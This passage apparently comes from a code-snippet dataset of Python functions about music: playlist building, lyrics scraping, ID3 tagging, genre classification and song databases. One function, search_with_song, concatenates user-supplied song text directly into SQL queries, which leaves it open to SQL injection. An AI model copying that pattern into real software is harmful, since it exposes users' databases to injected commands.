self.memcache.set(\"%s:1:onair_artist\" % self.prefix, datas[\"artist\"][0])\n self.memcache.set(\"%s:1:onair_score\" % self.prefix, score)\n except:\n pass\n\n try:\n self.memcache.set(\"%s:1:onair_full\" % self.prefix,\n \"%s - %s\" % (datas[\"artist\"][0],\n datas[\"title\"][0]))\n except:\n pass", "def classify(cls, title):\n\t\tpairs_list = TitleClassifier.reduce(TitleClassifier.classify_words(title))\n\t\treduced_list = [ cl for (cl, w) in pairs_list ]\n\t\tword_list = [ w for (cl, w) in pairs_list ]\n\t\tbrand_classes = [ ['russian', 'braced_ru'],\n\t\t\t['latin', 'braced_ru'],\n\t\t\t['latin', 'braced_lat'],\n\t\t\t['russian', 'braced_lat'],\n\t\t\t['latin', 'dash', 'russian', 'braced_ru'],\n\t\t\t['russian', 'dash', 'latin', 'braced_ru']\n\t\t]\n\t\tif reduced_list in brand_classes:\n\t\t\t#TODO: brand name extraction here\n\t\t\tif 'russian' in reduced_list:\n\t\t\t\tk = 'russian'\n\t\t\telif 'braced_ru' in reduced_list:\n\t\t\t\tk = 'braced_ru'\n\t\t\tname = ''\n\t\t\tfor cl, val in pairs_list:\n\t\t\t\tif cl == k:\n\t\t\t\t\tname += val\n\t\t\treturn (True, name.strip(\" ()\"))\n\t\telse:\n\t\t\treturn (False, None)", "def classify_encapsulated(audio_summary, track_info, pickle_file):\n\tf = open(pickle_file, 'r')\n\tfit = pickle.load(f)\n\tf.close()\n\trv = {}\n\t#print track_info.keys()\n\t#print track_info[audio_summary]['title'].keys()\n\trv[\"speechiness\"] = [audio_summary['audio_summary']['speechiness']]\n\trv[\"time_sig\"] = [audio_summary['audio_summary']['time_signature']]\n\trv[\"bpm\"] = [audio_summary['audio_summary']['tempo']]\n\trv[\"key\"] = [audio_summary['audio_summary']['key']]\n\trv[\"duration\"] = [audio_summary['audio_summary']['duration']]\n\trv[\"loudness\"] = [audio_summary['audio_summary']['loudness']]\n\trv[\"end_of_fade_in\"] = [track_info['track']['end_of_fade_in']]\n\trv[\"start_of_fade_out\"] = [track_info['track']['start_of_fade_out']]\n\trv[\"bpm_range\"] = [proc.bpm_range(track_info['beats'])]\n\trv[\"max_bpm_spike\"] = [proc.max_bpm_spike(track_info['beats'])]\n\ttry:\n\t\trv[\"num_keys\"] = [proc.num_keys(track_info['sections'])]\n\texcept:\n\t\trv[\"num_keys\"] = [1]\n\trv[\"sections\"] = [proc.num_sections(track_info['sections'])]\n\tnew_df = build_data_frame([rv],[\"Unknown\"])\n\tp = prob_category(new_df,fit)\n\trobjects.globalenv[\"pred\"] = p\n\tedm_prob = robjects.default_ri2py(p.rx(1))[0]\n\tfolk_prob = robjects.default_ri2py(p.rx(2))[0]\n\trap_prob = robjects.default_ri2py(p.rx(3))[0]\n\tcls = classify(new_df,fit)\n\treturn [(edm_prob,folk_prob,rap_prob),cls[0]]", "def set_song_fingerprinted(self, song_id):\n song = Songs.get(id=song_id)\n song.fingerprinted = True\n song.save()", "def bottle_song_for(num):\n pass", "def fetch_info(self, minimal: bool = False) -> None:\n self.found = False\n query: str = self.get_query(minimal)\n if not query:\n raise RuntimeError('No song has been defined.')\n # Prepare the API call.\n data: Any = None\n # Generate a list of english countries as alternatives to US to use whenever no result for a song is found.\n countries: List[str] = ['US', 'GB', 'AU']\n for country in countries:\n params: str = 'country=' + country + '&entity=song&limit=100&version=2&explicit=Yes&media=music'\n url: str = 'https://itunes.apple.com/search?term=' + parse.quote_plus(query) + '&' + params\n # Load results from iTunes API endpoint.\n data = Song.__fetch_from_url(url)\n if data:\n break\n if not data:\n title: str = Utils.Utils.str(self.title)\n Logger.Logger.log('Song ' + title + ' not found (query: ' + Utils.Utils.str(self.query) + ').')\n return\n # Update the song properties according to information returned by iTunes.\n self.__set_info_from_itunes(data, query)\n self.found = True\n if self.query_accuracy < 100:\n # If query accuracy was not the best, reprocess it using new information.\n self.__generate_search_query()", "def add_song(self):\r\n path = input(\"Give file path:\\t\") # Request file path\r\n path = path.replace('\\\\', '/')\r\n if self.path_song_re.match(path) and not self.path_storage_re.match(\r\n path): # Check that the path leads to a song that is not already found in Storage\r\n copy(path, self.p_storage) # Copy the song to the storage directory\r\n file_title, form = path.split(\"/\")[-1].split(\".\") # Save file title and format from the path\r\n sql = \"SELECT COUNT(*) FROM songs WHERE file_title = %s AND form = %s\" # Check the existence of a song\r\n # with the same title and format in the database\r\n self.cursor.execute(sql, (file_title, form))\r\n r = self.cursor.fetchall()\r\n if r[0][0] != 0:\r\n return \"A song with this file name and format already exists!\"\r\n song_title = input(\"Song title:\\t\")\r\n artist = input(\"Artist:\\t\")\r\n data = input(\"Release date:\\t\")\r\n tags = input(\"Associated tags:\\t\")\r\n sql = \"INSERT INTO songs (file_title, song_title, artist, form, data, tag) VALUES (%s, %s, %s, %s, %s, \" \\\r\n \"%s) \" # Insert song into database\r\n columns = (file_title, song_title, artist, form, data, tags)\r\n self.cursor.execute(sql, columns)\r\n self.cnx.commit()\r\n self.cursor.execute(\r\n \"SELECT MAX(ID) FROM songs\")\r\n result = self.cursor.fetchall()\r\n return \"New song ID: \" + str(result[0][0])\r\n else:\r\n return \"Give valid path\"", "def detect_netease_music_name(file_path, dist_path, KEEP_SOURCE=True):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\"\n }\n url_base = \"http://music.163.com/api/song/detail/?id={}&ids=[{}]\"\n\n if not os.path.exists(dist_path):\n os.mkdir(dist_path)\n\n for file_name in os.listdir(file_path):\n if not file_name.endswith(\".mp3\"):\n continue\n if not len(file_name.split(\"-\")) == 3:\n print(\n \">>>> File %s not in format <song id>-<bite rate>-<random number>.mp3\"\n % (file_name)\n )\n continue\n\n try:\n song_id = file_name.split(\"-\")[0]\n url_target = url_base.format(song_id, song_id)\n resp = requests.get(url_target, headers=headers)\n rr = json.loads(resp.text)\n\n tt = eyed3.load(os.path.join(file_path, file_name))\n tt.tag.title = rr[\"songs\"][0][\"name\"].replace(\"\\xa0\", \" \")\n tt.tag.artist = rr[\"songs\"][0][\"artists\"][0][\"name\"]\n tt.tag.album = rr[\"songs\"][0][\"album\"][\"name\"]\n tt.tag.album_artist = rr[\"songs\"][0][\"album\"][\"artists\"][0][\"name\"]\n print(\n \"song_id = %s, tt.tag title = %s, artist = %s, album = %s, album_artist = %s\"\n % (\n song_id,\n tt.tag.title,\n tt.tag.artist,\n tt.tag.album,\n tt.tag.album_artist,\n )\n )\n tt.tag.save()\n except UnicodeEncodeError as e:\n print(\n \">>>> UnicodeEncodeError, try again later: file_name = %s, error = %s\"\n % (file_name, str(e))\n )\n continue\n except:\n print(\">>>> Some other error happens: file_name = %s\" % (file_name))\n continue\n\n dist_name = (\n os.path.join(\n dist_path,\n \"%s - %s\"\n % (tt.tag.artist.replace(\"/\", \" \"), tt.tag.title.replace(\"/\", \" \")),\n )\n + \".mp3\"\n )\n \n if KEEP_SOURCE == True:\n shutil.copyfile(os.path.join(file_path, file_name), dist_name)\n else:\n os.rename(os.path.join(file_path, file_name), dist_name)", "def __init__(self, song_name, lyrics, valence):\n self.name = song_name\n self.lyrics = lyrics\n self.valence = valence\n self.lexD = None\n self.emotion = None\n self.sentiment = None\n self.color = None\n self.gloom = None", "def add_song_to_playlist(self):\n #populate our songs dictionary\n self.get_liked_videos()\n\n #collect all of uri\n uris = []\n for song,info in self.all_song_info.items():\n uris.append(info[\"spotify_uri\"])\n\n #create a new playlist\n playlist_id = self.create_playlist()\n\n #add all songs into new playlist\n\n #Spotipy can only add 100 songs at a time to a playlist that is why this method is taken\n g = len(uris)\n if g > 100:\n s = 0\n e = 99\n while g > 100:\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris[s:e])\n g -= 100\n s = e + 1\n e += 100\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris[s:])\n else:\n self.sp.user_playlist_add_tracks(user=self.username, playlist_id=playlist_id,\n tracks=uris)", "def scrape_song_to_db(self, artist, title, track_id):\n\n # remove featured artist names\n artist = stripFeat(artist)\n\n try:\n # record stout from lyricsgenius call because it catches errors and prints\n with Capturing() as output:\n songdata = self.api.search_song(title, artist)\n\n # for the few errors that have been raised\n except ReadTimeout:\n self.api.sleep_time += 3\n print(f\"sleep time increased to {self.api.sleep_time}\")\n self.record_error(track_id, \"ReadTimeout\")\n self.scrape_song_to_db(artist, title, track_id)\n return\n\n # take sleep time slowly back to minimum\n if self.api.sleep_time > self.minsleep:\n self.api.sleep_time -= 0.25\n print(f\"sleep time decreased to {self.api.sleep_time}\")\n\n # search successful\n if songdata != None:\n self.record_lyrics_result(track_id, songdata)\n\n # handle (record & retry) Timeout error\n elif output[1].startswith(\"Timeout\"):\n self.api.sleep_time += 3\n self.record_error(track_id, \"Timeout\")\n self.scrape_song_to_db(artist, title, track_id)\n return\n\n # record error: not in genius db\n elif output[1].startswith(\"No results\"):\n self.record_error(track_id, \"no_results\")\n\n # record error: song without lyrics\n elif output[1] == \"Specified song does not contain lyrics. Rejecting.\":\n self.record_error(track_id, \"lacks_lyrics\")\n\n # record error: URL issue\n elif (\n output[1]\n == \"Specified song does not have a valid URL with lyrics. Rejecting.\"\n ):\n self.record_error(track_id, \"invalid_url\")", "def query_get_song_recommendation(songtitle, artist, root):\n for child in root:\n if (song_information.get_songtitle(child) == songtitle\n and song_information.get_artist(child) == artist):\n song = child\n else:\n answer = (\"Sorry, '\" + songtitle + \"' by \" + artist\n + \"could not be found in this corpus\")\n similar_songs = find_similar_songs(song, root)\n if len(similar_songs) > 0:\n answer = (\"If you like '\" + songtitle + \"' by \" + artist\n + \", you might like \" + \", \".join(similar_songs))\n else:\n answer = (\"Sorry, there is no similar song to '\" + songtitle + \"' by \"\n + artist + \" in this corpus\")\n return answer", "def _classify(self, example):\n neighbors = self.find_neighbor(example)\n class_label = self.find_response(neighbors)\n return class_label", "def prob_category(new_music, fit):\n\tr = robjects.r\n\t#Be careful not to include the word 'data' in the function call below, although data is a keyword\n\tpredictions = r.predict(fit,new_music,type=\"prob\")\n\treturn predictions", "def add_song(self, name, year, title):\n\n # Here we check if album exist under artist.\n album_found = find_object(name, self.albums)\n if album_found is None: # If there is no album found\n print(name + \"not found\") # we print \"Album name not found\n album_found = Album(name, year, self.name) # Change_3: Pass \"self.name\" instead of \"self\"\n self.add_album(album_found) # We add new_album to song.\n else: # if we found an existing album with same name\n print(\"found album\" + name) # we print found album name\n\n # so we add song to album_found\n album_found.add_song(title)", "def new_song():\n song_id = int(request.args['song_id'])\n track_info = shiva.get_tracks([song_id])[song_id]\n vlc.add_song(track_info['path'])\n return 'ok'", "def get_song(self, song_id):\n url = get_song_url(song_id)\n result = self.get_request(url)\n\n return result['songs'][0]", "def get_song_name_from_result(result):\n return result['metadata']['music'][0]['external_metadata']['spotify']['track']['name']", "def play(song):\n # Show the metadata\n if (verbose==True):\n for s in song.keys():\n print s, \":\", \n print song[s]\n else:\n print \"Title:\", song[\"title\"]\n print \"Artisit:\", song[\"artist\"]\n print \"Album:\", song[\"albumtitle\"]\n print \"Year\", song[\"public_time\"]\n print \"Company:\", song[\"company\"]\n print \"Length\", song[\"length\"]\n print \"Playing...\"\n mp3_url = song[\"url\"]\n song_length = song[\"length\"]\n p = subprocess.Popen([\"mplayer\", \"-msglevel\", \"all=0\", mp3_url])\n\n # At the same time, download the song:\n u = urllib2.urlopen(mp3_url)\n local_mp3 = open(song[\"title\"] + \"-\" + song[\"artist\"] + \".mp3\", \"w\")\n local_mp3.write(u.read())\n local_mp3.close()\n # time.sleep(song_length)\n i = 0\n while(True):\n time.sleep(1)\n i += 1\n if i == song_length:\n # Kill the process when the song is finished.\n p.terminate()\n print \"#\" * 80\n break", "def __add_artist(self, artist, genius_api):\n\t\tentry = {\n\t\t\t'id' : int(artist['id']),\n\t\t\t'name' : artist['name'].lower(),\n\t\t\t'is_verified' : artist['is_verified'],\n\t\t\t'url' : artist['url'],\n\t\t\t'songs' : genius_api.get_artist_songs_id(artist['id'], artist_name=artist['name'])\n\t\t\t}\n\t\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\tself.db.artists.insert_one(entry)", "def add_song(self, song, position=None):\n\n # Use find_object to see if the song exist already.\n song_found = find_object(song, self.tracks) # look for song.tracks to see if it exist in the list\n if song_found is None: # if song is not found\n song_found = Song(song, self.artist) # We create new song using \"Song\" function and assign it to song_found\n if position is None: # If there are no songs in this track\n self.tracks.append(song_found) # Add this song_found in the first position\n else: # else if there are already some songs in the track\n self.tracks.insert(position, song_found) # inserts the position and song in self.tracks list", "def __set_info_from_itunes(self, data: Any, query: str) -> None:\n if data['resultCount'] == 0:\n return\n Logger.Logger.log('Processing metadata from iTunes...')\n index: int = 0\n if data['resultCount'] != 1 and not Config.Config.get_strict_meta():\n Logger.Logger.log('Multiple results returned by iTunes, filtering them...')\n index = Song.__filter_itunes_results(data['results'], query)\n data = data['results'][index]\n # Add support for album artist and composer.\n self.title = data['trackName']\n self.artist = data['artistName']\n self.album_artist = data['artistName']\n self.genre = data['primaryGenreName']\n self.album = data['collectionName']\n release_date: datetime = datetime.strptime(data['releaseDate'], '%Y-%m-%dT%H:%M:%SZ')\n self.year = release_date.year\n self.cover_url = data['artworkUrl100'].replace('100x100bb.jpg', '1000x1000bb.jpg')\n self.disc_count = data['discCount']\n self.disc_number = data['discNumber']\n self.track_count = data['trackCount']\n self.track_number = data['trackNumber']\n # TODO: Currently iTunes doesn't support information about group and composer.\n # self.group = data['artistName']\n # self.composer = data['artistName']\n if data['trackExplicitness'] == 'explicit':\n self.explicit = True\n else:\n self.explicit = False\n self.album_url = data['artistViewUrl']\n self.track_url = data['trackViewUrl']", "def getSong(self):\n queue = self.instantiate_queue()\n song_data = queue.pop(0)\n\n history = self.instantiate_history()\n history_song_data = deepcopy(song_data)\n history_song_data['time_played'] = time() + 5\n history.append(history_song_data)\n\n if len(queue) < 5:\n self.addImplicit(queue, history)\n \n self.ageSongs(queue)\n self.calculateScore(queue)\n queue = self.sortSongs(queue)\n\n self.cache.set('queue', queue)\n self.cache.set('history', history)\n\n keys = ['name', 'track_id', 'artist', 'album_uri', 'album_name', 'duration', 'explicit', 'valence', 'energy']\n args = [song_data[key] for key in keys]\n return Song(*args)", "def update_song(_id, _name_of_the_song, _duration_in_number_of_seconds):\r\n song_to_update = Song.query.filter_by(id=_id).first()\r\n song_to_update.name_of_the_song = _name_of_the_song\r\n song_to_update.duration_in_number_of_seconds = _duration_in_number_of_seconds\r\n db.session.commit()", "def find_song(spotify, query, matchRatio=0.75):\n results = spotify.search(\"track:\\\"\" + query + \"\\\"\", limit=50, type='track')\n candidates = list(map(lambda track: {'name': track['name'], 'uri': track['uri']}, \n results['tracks']['items']))\n for candidate in candidates:\n matcher = difflib.SequenceMatcher(None, candidate['name'].lower(), query.lower())\n if matcher.ratio() >= matchRatio:\n print(\"Adding song \" + candidate[\"name\"] + \" for \" + query)\n return candidate['uri']\n print(\"Found no matches for \" + query)\n return None", "def classify(self, data):\n abstract", "def predict_best_songs(track_id):\n #This will give us a list of features necessary for prediction\n #Code by Ekaterina & Hernan\n song_to_predict = get_features(track_id)\n #Add song to existing DB\n #Code by Hernan\n add_song(song_to_predict)\n #This K Means model will give us a list of recommended songs\n #Code by Josh\n def predicto(track_id):\n # Instantiate and fit knn to the correct columns\n knn = NearestNeighbors(n_neighbors=20)\n knn.fit(df[df.columns[5:]])\n obs = df.index[df['id'] == track_id]\n series = df.iloc[obs, 5:].to_numpy()\n neighbors = knn.kneighbors(series)\n new_obs = neighbors[1][0][6:20]\n return list(df.loc[new_obs, 'id'])\n #Converting the DB to a DF to run a K Means model through\n conn = sqlite3.connect('sprs/spotitry_songs.db')\n curs = conn.cursor()\n SQL_Query = pd.read_sql_query(''' SELECT * from song ''',conn)\n df = pd.DataFrame(SQL_Query, columns=['id','name','energy',\n 'liveness','danceability','instrumentalness','loudness',\n 'speechiness','valence','tempo'])\n track_list = predicto(track_id)\n #Here we'll turn our list of track ids into song names\n #Code by Ekaterina & Hernan\n #Re-written by Hernan to return json with feature list\n suggestions = get_features(track_list[0])\n column_names = ['track_id', 'name', 'acousticness', 'danceability', 'duration_ms', 'energy', 'instrumentalness',\n 'liveness', 'loudness', 'speechiness', 'tempo', 'valence']\n final = pd.DataFrame([suggestions], columns=column_names)\n result = final.to_json()\n return result", "def get_songs(self, song_list):\n self.songs = [[s.name, s.movie_name] for s in song_list\n if s.raga == self.name]", "def artist_song_first_pass(self):\n log.debug(\"Called artist_song_first_pass for %s.\" % self.name)\n self.success = False\n song_potentials = []\n potential_count = 0\n _min = 20\n\n def generate_potentials(count):\n results = self.sp.search(q= 'artist: ' + self.artist + ' track: ' + self.song, type='track', limit=2)\n if results['tracks']['total'] >= 1:\n for items in results['tracks']['items']:\n song_potentials.append([items['name'], items['uri']])\n for artist in items['artists']:\n song_potentials[count].append(artist['name'])\n song_potentials[count].append(artist['uri'])\n count += 1\n\n for splitter in splitters:\n if self.name_clean.count(splitter) == 1:\n self.artist, self.song = self.name_clean.split(splitter)\n generate_potentials(potential_count)\n elif self.name_clean.count(splitter) > 1:\n for x in range(0, self.name_clean.count(splitter)):\n self.artist, self.song = split(self.name_clean, splitter, x)\n generate_potentials(potential_count)\n\n cutoff = matching(self.name_clean)\n log.debug(\"%s potential matches found for %d\" % (len(song_potentials), id(self)))\n log.debug(\"Potentials: %s\" % song_potentials)\n for potential in song_potentials:\n log.debug(potential)\n log.debug(self.name_clean)\n log.debug(str(potential[2]) + \" \" + str(potential[0]))\n lev = levenshtein(self.name_clean, str.lower(str(potential[2])) + \" \" + str.lower(str(potential[0])))\n log.debug(lev)\n if lev < _min:\n _min = lev\n self.artist = potential[2]\n self.artist_uri = potential[3]\n self.song = potential[0]\n self.song_uri = potential[1]\n\n if self.artist_uri and self.song_uri is not None:\n log.debug(\"Cutoff point for %s : %d\" % (id(self), cutoff))\n log.debug(\"Current Min: {}\".format(_min))\n log.debug(\"Levenshtein distance between {} and {} : {}\"\n .format(self.name_clean, self.artist + self.song,\n levenshtein(self.name, self.artist + \" \" + self.song)))\n if int(_min) > cutoff:\n log.debug(\"Method artist_song_first_pass failed for %s.\" % self.name)\n self.success = False\n self.artist = None\n self.song = None\n else:\n log.debug(\"Method artist_song_first_pass succeeded for %s.\" % self.name)\n self.success = True\n else:\n log.debug(\"Method artist_song_first_pass failed for %s.\" % self.name)\n self.success = False\n self.artist = None\n self.song = None", "def FromMeta(self, artist, album, track_number, song):\n\n # Cleanup input\n artist = artist.rstrip()\n album = album.rstrip()\n song = song.rstrip()\n\n self.persistant = self.db.GetOneRow('select * from tracks where '\n 'artist=%s and album=%s '\n 'and number=%d and song=%s;'\n %(sql.FormatSqlValue('artist',\n artist),\n sql.FormatSqlValue('album',\n album),\n track_number,\n sql.FormatSqlValue('song',\n song)))\n\n if not self.persistant:\n self.persistant = {}\n self.persistant['artist'] = artist\n self.persistant['album'] = album\n self.persistant['number'] = track_number\n self.persistant['song'] = song\n\n self.persistant['plays'] = 0\n self.persistant['skips'] = 0\n self.persistant['creation_time'] = datetime.datetime.now()", "def song_has_lyrics():\n pass", "def put(self, request):\n ProcessingService.save_file(uploaded_file=request.data['file'],\n artist=request.data['artist'], title=request.data['title'])\n tasks.process_audio.delay(uploaded_file_path=settings.FILE_UPLOAD_DIR + request.data['file'].name,\n artist=request.data['artist'], title=request.data['title'])\n return Response(status=status.HTTP_200_OK)", "def createsong(tags, sig, fpath, played=0):\n\n song = Song.objects.create(artist=tags['artist'],\n album=tags['album'],\n title=tags['title'],\n genre=tags['genre'],\n score=0,\n played=played,\n uniq=sig,\n global_score=0,\n filename=fpath)\n # lookup to fill cover\n picture.delay(song)\n \n if hasattr(song, 'title') and song.title != '':\n try:\n song.genre += ','.join(get_tags(song.artist, song.title))\n except:\n pass\n song.save()\n return \"[I] %s\\n\" % song.title", "def next_song(sid):\n try:\n # Get the host data from the database\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n spotify.next(host['ip'])\n return jsonify({})\n except:\n abort(400)", "def set_happy_song(self, song_number):\n self._happy_song_num = int(math.fabs(song_number)) % 5\n\n # Song is in c major scale and is the 5th (G) to the 3rd (E).\n cmd = \"140 \" + str(self._happy_song_num) + \" 2 64 16 67 16\"\n\n self._serial_conn.send_command(cmd)", "def classical_search(data, primary, genre):\n __counter = 0 # count total number of songs get\n __browser = chrome_driver_setup()\n\n # read data file, extract list of artists\n artists = txt_to_list(data, delimiter=',')\n\n # for each artist, find artist id and then output list of album names\n __index = 0\n make_directory(\"results/{}\".format(primary))\n filecount = 0\n while filecount <= len(artists)//10:\n print(\"========== Starting for batch {} - {} ==========\".format(filecount*10,(filecount+1)*10))\n for artist in artists[filecount*10:(filecount+1)*10]:\n print(\" NOW FOR ARTIST: {} \".format(artist))\n aid = get_artist_id(artist)\n if aid is None:\n print(\"Cannot find artist {} in Spotify.\".format(artist))\n continue\n album_ids = get_artist_albums_classical(aid)\n for album in album_ids:\n tracks = get_album_tracks(album, 'name')\n if tracks is None:\n print(\"Artist {} has no album found in Spotify.\".format(artist))\n continue\n for track in tracks:\n if track is None or track == \"\":\n print(\"Empty track, skip...\")\n continue\n print(\"Current track: {}\".format(track))\n sleep(randint(3, 5))\n __index += 1\n link, score, title, duration = get_song_for_classical(track, __browser, genre)\n if link == \"skipped\":\n print(\"Duplicate, skip...\")\n continue\n csv_writer_append(\"results/{}/{}_{}.csv\".format(primary, genre, filecount+1),\n __index,\n track,\n title,\n link,\n score,\n duration)\n print(\"{} -- CSV done: {} {} {} {}\".format(__index, title, link, score, duration))\n print(\"\")\n print(\"||||||||||| Finished for batch {} - {} |||||||||||\".format(filecount*10,(filecount+1)*10))\n filecount += 1", "def add_the_song_to_playlist(self):\n com_util.tap_on(self.driver, element['AddToPlaylist'])\n # com_util.send_to(self.driver, element['EnterThePlaylist'], 'My Songs')\n com_util.tap_on(self.driver, element['ClickMySongs'])\n # com_util.tap_on(self.driver, element['SaveBtn'])\n com_util.tap_on(self.driver, element['CancelBtn'])\n com_util.tap_on(self.driver, element['DownArrow'])", "def search_with_song(song_name: str, mode: int) -> str:\n SONG_NAME = 1\n db = get_db_name_by_mode(mode)\n song_list = get_singers_and_songs_by_mode(mode)[1]\n res = []\n songs_data = []\n\n db_connection = sqlite3.connect(db)\n if get_acceleration_flag(mode, True):\n for letter in song_name:\n db_cursor = db_connection.cursor()\n db_cursor.execute('SELECT * FROM TEST WHERE SONG LIKE \"%' + letter + '%\"')\n songs_data.extend([song for song in db_cursor.fetchall()])\n pass\n songs_data = list(dict.fromkeys(songs_data))\n similar_songs = [song[SONG_NAME] for song in songs_data]\n similar_songs = compare.compare(similar_songs, song_name, ac=True)\n for song_with_similar_score in similar_songs: # pick the song in similar_songs from in songs_data\n for song_info in songs_data:\n if song_with_similar_score[SONG_NAME] == song_info[SONG_NAME]:\n res.append(song_info)\n break\n pass\n else:\n similar_songs = compare.compare(song_list, song_name)\n for song_with_similar_score in similar_songs:\n db_cursor = db_connection.cursor()\n db_cursor.execute('SELECT * FROM TEST WHERE SONG = \"' + song_with_similar_score[SONG_NAME] + '\"')\n res.extend(db_cursor.fetchall())\n pass\n pass\n db_connection.close()\n\n if len(res) == 0:\n return response.pack(response.EMPTY, res)\n else:\n return response.pack(response.SUCCESS, res)\n pass", "def notify_song_found(song, station_frequency, favourite=False):\n display_screen(song, station_frequency)\n if switches.is_active_announce_all_songs_switch() or favourite:\n say_information_out_loud(song, station_frequency)", "def classify(model, featuresFile='tmp/features.txt'):\n\n # Use external svm_classify to classify audio using the given features\n subprocess.call(['svm_classify', featuresFile, model, 'tmp/result.txt'])\n\n # Read results\n results = []\n with open('tmp/result.txt', 'r') as f:\n results = f.readlines()\n for i in range(0, len(results)):\n results[i] = 'Music' if float(results[i]) > 0 else 'Speech'\n\n return results", "def set_artist_song_entry(self, artist, song):\n self.artist_name.set_text(artist)\n self.song_name.set_text(song)", "def song_save(song_id):\r\n querystring = apiurl_musixmatch + \"track.lyrics.get?track_id=\" + urllib2.quote(\r\n song_id) + \"&apikey=\" + apikey_musixmatch + \"&format=plain\"\r\n try:\r\n request = urllib2.Request(querystring)\r\n # timeout set to 4 seconds; automatically retries\r\n response = urllib2.urlopen(request, timeout=4)\r\n # raw = response.read()\r\n print colored.green(\"Starting\", bold=12)\r\n all_data = ''\r\n while True:\r\n do_task()\r\n print '\\b.',\r\n sys.stdout.flush()\r\n data = response.read(2048)\r\n if not data:\r\n break\r\n all_data += data\r\n time.sleep(0.4)\r\n print \"\\n\"\r\n json_obj = json.loads(all_data.decode(\"utf-8\"))\r\n body = json_obj[\"message\"][\"body\"][\"lyrics\"][\"lyrics_body\"]\r\n if body == 0:\r\n print colored.red(\"No lyrics found\", bold=12)\r\n else:\r\n song_found = SongLyricsFinder(song_id, body)\r\n session.add(song_found)\r\n session.commit()\r\n print colored.green(\"Song saved successfully.\", bold=12)\r\n except socket.timeout:\r\n print \"Timeout raised and caught\"", "def ft_in_title(self, item, drop_feat):\n artist = item.artist.strip()\n albumartist = item.albumartist.strip()\n\n # Check whether there is a featured artist on this track and the\n # artist field does not exactly match the album artist field. In\n # that case, we attempt to move the featured artist to the title.\n _, featured = split_on_feat(artist)\n if featured and albumartist != artist and albumartist:\n self._log.info('{}', displayable_path(item.path))\n\n feat_part = None\n\n # Attempt to find the featured artist.\n feat_part = find_feat_part(artist, albumartist)\n\n # If we have a featuring artist, move it to the title.\n if feat_part:\n self.update_metadata(item, feat_part, drop_feat)\n else:\n self._log.info('no featuring artists found')", "def set_track_metadata(self, track = None, filename = None, url = None):\n if url == None or track == None:\n return None\n\n if filename == None:\n filename = get_track_filename(url)\n\n # id3 is only for mp3\n if not filename.endswith(\".mp3\"):\n if filename.endswith(\".wav\"):\n filename = self.convert_wav_to_mp3(filename)\n else:\n return None\n\n\n # Set title\n try:\n meta = ID3(filename)\n except ID3NoHeaderError:\n try:\n meta = File(filename, easy=True)\n meta.add_tags()\n meta.save()\n meta = ID3(filename)\n except:\n return\n except IOError:\n return\n\n try:\n meta.add(TIT2(encoding=3, text=track.title))\n meta.add(TCON(encoding=3, text=track.genre))\n meta.add(TCOM(encoding=3, text=track.user[\"username\"]))\n meta.save()\n\n artwork_filename = wget.download(track.artwork_url)\n\n audio = MP3(filename, ID3=ID3)\n\n # add ID3 tag if it doesn't exist\n try:\n audio.add_tags()\n except error:\n pass\n\n audio.tags.add(\n APIC(\n encoding=3, # 3 is for utf-8\n mime='image/jpeg', # image/jpeg or image/png\n type=3, # 3 is for the cover image\n desc=u'Cover',\n data=open(artwork_filename).read()\n )\n )\n audio.save()\n except:\n return", "def convertclasstoemotion(pred):\n \n label_conversion = {'0': 'neutral',\n '1': 'calm',\n '2': 'happy',\n '3': 'sad',\n '4': 'angry',\n '5': 'fearful',\n '6': 'disgust',\n '7': 'surprised'}\n\n for key, value in label_conversion.items():\n if int(key) == pred:\n label = value\n return label", "def change_music(self, track):\n try:\n if self.bg_volume != 0:\n self.current = self.music_lib[track]\n pygame.mixer.music.load(self.current)\n pygame.mixer.music.play(-1)\n self.current = track\n else:\n pygame.mixer.music.stop()\n except:\n print \"Couldn't load track '\", track + \"'!\"", "def get_song(self, song_id):\n url = get_song_url(song_id)\n result = self.common_get_request(url,headers)\n\n return result['songs'][0]", "def add_songs(self, song, position=None):\n song_found = find_object(song, self.tracks)\n if song_found is None:\n song_found = Song(song, self.artist)\n if position is None:\n self.tracks.append(song_found)\n else:\n self.tracks.insert(position, song_found)", "def addSong(self, song):\n queue = self.instantiate_queue()\n history = self.instantiate_history()\n options = self.instantiate_options()\n\n queue = [song for song in queue if song['explicit']]\n queue.append(song.to_dict())\n\n if len(queue) < 5:\n self.addImplicit(queue, history, fallback_song=song.to_dict())\n \n queue = self.sortSongs(queue)\n self.cache.set('queue', queue)", "def add_new_song(self):\n return \"New Song Added\"", "async def get_song(self, song_id: int) -> APIReturn:\n return await self._request(\"GET\", \"/getSong\", extra_query={\"id\": song_id})", "def azlyrics(song, artist):\n song = song.replace(\" \", \"\")\n artist = artist.replace(\" \", \"\")\n url = 'http://www.azlyrics.com/lyrics/' + artist + '/' + song + '.html'\n html_text = urllib.urlopen(url).read()\n soup = BeautifulSoup(html_text, \"lxml\")\n find_lyrics = soup.find_all(\"div\")\n div = [x for x in find_lyrics if str(x).find(\"class=\") == -1]\n if(len(div) > 1):\n return div[1]\n else:\n return -1", "def cut_and_eq(song_name):\r\n print(\"[{}] STATUS: Loading...\".format(song_name))\r\n sound_file = AudioSegment.from_mp3(song_name)\r\n print(\"[{}] STATUS: Loaded, now processing...\".format(song_name))\r\n sound_file = match_target_amplitude(sound_file, TARGET_VOLUME) # Amplify beforehand to prevent over-zealous cutting\r\n chunks = split_on_silence(sound_file, SILENCE_CUTOFF, THRESHOLD, keep_silence=ACCEPTABLE_SILENCE)\r\n\r\n if len(chunks) > 1:\r\n print(\"[{}] ERROR: Too many chunks ({}) cannot export\".format(song_name, len(chunks)))\r\n return song_name\r\n else:\r\n output = AudioSegment.empty()\r\n for chunk in chunks:\r\n output += chunk\r\n\r\n new_name = song_name.split(\".\")[0]\r\n print(\"[{}] STATUS: Processed, now exporting...\".format(song_name))\r\n metadata = mediainfo(song_name).get('TAG',{})\r\n output.export(OUTPUT_NAME_FORMAT.format(new_name), format=OUTPUT_FORMAT, tags=metadata)\r\n print(\"[{}] STATUS: Exported to {} - cleaned.{}\".format(song_name, new_name, OUTPUT_FORMAT))\r\n return None" ]
